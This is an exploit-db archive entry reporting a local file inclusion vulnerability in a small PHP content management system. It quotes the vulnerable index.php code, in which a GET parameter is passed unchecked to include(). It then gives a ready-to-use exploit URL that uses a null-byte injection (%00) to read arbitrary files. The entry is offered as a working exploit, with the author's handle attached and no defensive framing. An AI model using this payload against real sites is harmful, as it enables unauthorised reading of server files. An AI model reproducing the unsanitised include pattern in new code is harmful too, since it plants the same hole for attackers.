exploit-db-mirror/exploits/php/webapps/7818.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

32 lines
No EOL
937 B
Text

--:local file include:--
---------------------------------
script:simple content management system v 1
-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip
-------------------------------------------------------
...............................................
vul:/index.php line 34:
<?php
if (!isset($_GET['p']))
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");
?>
-------------------------------------------
-------------------------------------------
xpl:
http://127.0.0.1/path/index.php?p=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from:[iran]
---------------------------------------------------
# milw0rm.com [2009-01-18]